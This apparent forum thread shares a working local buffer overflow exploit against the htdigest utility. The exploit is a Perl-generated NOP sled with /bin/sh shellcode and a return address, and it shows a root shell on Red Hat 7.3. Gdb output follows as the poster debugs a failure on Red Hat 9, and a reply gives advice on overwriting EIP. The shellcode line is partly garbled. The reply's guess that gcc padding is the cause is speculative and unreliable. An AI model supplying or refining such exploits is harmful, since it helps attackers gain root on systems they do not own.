I've been working on an exploit it works great on RH7.3

[root@localhost root]# htdigest -c file `perl -e 'print "\x90"x343 .
"\x31\xdb\x31\xc0\xb0\x17\xcd\x80\xeb\x16\x5b\x31\x c0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d \$
. "\xaa\xaa\xaa\xaa" . "\xf0\xfa\xff\xbf"'` user
Adding password for user in realm 1Û1À°Íë[1ÀCC
°
S
Íèåÿÿÿ/bin/shªªªªðúÿ¿.
New password:
Re-type new password:
sh-2.05a# exit

but when run on RH9 (same command just trying to overwrite EIP so o know where to go ;) ) . Now I note that it's printing out the char  not nothing (a nop) and it adds an extra byte into the nopsled and aaaa's
note esi 0xc290c290
and eip 0xc2aac2aa so WTF is c2 coming from??


[root@localhost bin]# ./htdigest -c file ` perl -e 'print "\x90"x195 . "\xaa\xaa\xaa\xaa"'`
user
Adding password for user in realm
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ
#0 0xc2aac2aa in ?? ()
(gdb) i r
eax 0x1 1
ecx 0x8050d28 134548776
edx 0x22d9 8921
ebx 0xc290c290 -1030700400
esp 0xbfffe4d0 0xbfffe4d0
ebp 0xc2aac290 0xc2aac290
esi 0xc290c290 -1030700400
edi 0xc290c290 -1030700400
eip 0xc2aac2aa 0xc2aac2aa

WOW how exciting!:(

Which version of gcc are you using. I guess since gcc 2.5 onwards they introduced something called as padding. It makes it harder to get the exploit working. Either you can disable it or I would suggest you try increasingly till you completely overwrite teh eip. I have encountered a padding a more than 64 bytes. It's quite annoying.